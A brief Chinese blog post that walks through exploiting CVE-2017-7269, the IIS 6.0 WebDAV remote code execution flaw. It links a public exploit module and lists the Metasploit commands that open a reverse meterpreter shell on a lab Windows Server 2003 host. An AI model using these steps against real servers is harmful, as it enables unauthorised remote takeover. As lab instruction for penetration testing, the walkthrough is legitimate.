CVE-2017-7269(IIS远程代码执行)

利用CVE-2017-7269让IIS向自己的msf反弹一个shell

漏洞编号:CVE2017-7269
服务器版本:Windows server 2003
中间件:IIS6.0
攻击工具:metasploit
POC:CVE2017-7269.rb

exp:https://github.com/zcgonvh/cve-2017-7269

1. 确认目标是IIS并且开启webdav

在这里插入图片描述

2.打开msf,使用exp

msfconsole
 use exploit/windows/iis/cve-2017-7269

在这里插入图片描述

set rhost 192.168.91.129

在这里插入图片描述

show options

在这里插入图片描述

run

在这里插入图片描述

获得一个meterpreter
在这里插入图片描述

posted @ 2018-11-20 17:56  浅笑996  阅读(958)  评论(0编辑  收藏  举报